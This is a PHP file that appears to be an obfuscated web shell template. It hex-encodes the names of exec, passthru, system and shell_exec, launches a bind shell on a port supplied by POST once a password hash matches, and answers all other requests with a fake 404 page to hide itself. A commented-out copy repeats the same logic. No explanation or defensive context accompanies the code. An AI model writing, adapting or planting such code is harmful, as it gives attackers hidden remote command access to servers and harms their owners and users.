<?php
$p = 'your_md5_password_here';
$s = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65"('shell_filepath');
$u = 'execute_with';

if (${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x4d\x45\x54\x48\x4f\x44"] === 'POST') {
    $port = ${"\x5f\x50\x4f\x53\x54"}["\x70\x6f\x72\x74"];
    $password = ${"\x5f\x50\x4f\x53\x54"}["\x70\x61\x73\x73"];
    $ex  = "\x65\x78\x65\x63";
    $pst = "\x70\x61\x73\x73\x74\x68\x72\x75";
    $sys = "\x73\x79\x73\x74\x65\x6d";
    $sex = "\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63";
    $command = "$u $s $port > /dev/null 2>&1 &";

    if ("\x68\x61\x73\x68"("\x73\x68\x61\x32\x35\x36", $password) === $p) {
        if ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($ex)) {
            $outputArray = [];
            $ex($command);

        } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($pst)) {
            "\x6f\x62\x5f\x73\x74\x61\x72\x74"();
            $pst($command);

        } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sys)) {
            "\x6f\x62\x5f\x73\x74\x61\x72\x74"();
            $sys($command);

        } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sex)) {
            $sex($command);
        } else {
            echo "Unable to execute command";
            die();
        }
        echo "Bind shell started on port $port.\n";
    } else {
        echo "Invalid password.\n";
    }
} else {
    header("HTTP/1.0 404 Not Found");
}

//if (${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x4d\x45\x54\x48\x4f\x44"] === "POST") { $port = ${"\x5f\x50\x4f\x53\x54"}["\x70\x6f\x72\x74"]; $password = ${"\x5f\x50\x4f\x53\x54"}["\x70\x61\x73\x73"]; $ex= "\x65\x78\x65\x63"; $pst = "\x70\x61\x73\x73\x74\x68\x72\x75"; $sys = "\x73\x79\x73\x74\x65\x6d"; $sex = "\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63"; $command = "$s $port > /dev/null 2>&1 &"; if ("\x68\x61\x73\x68"("\x73\x68\x61\x32\x35\x36", $password) === $p) { if ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($ex)) { $outputArray = []; $ex($command); } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($pst)) { "\x6f\x62\x5f\x73\x74\x61\x72\x74"(); $pst($command); } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sys)) { "\x6f\x62\x5f\x73\x74\x61\x72\x74"(); $sys($command); } elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sex)) { $sex($command); } else { echo "Unable to execute command"; die(); } echo "Bind shell started on port $port.\n"; } else { echo "Invalid password.\n"; }} else { header("HTTP/1.0 404 Not Found");}
?>
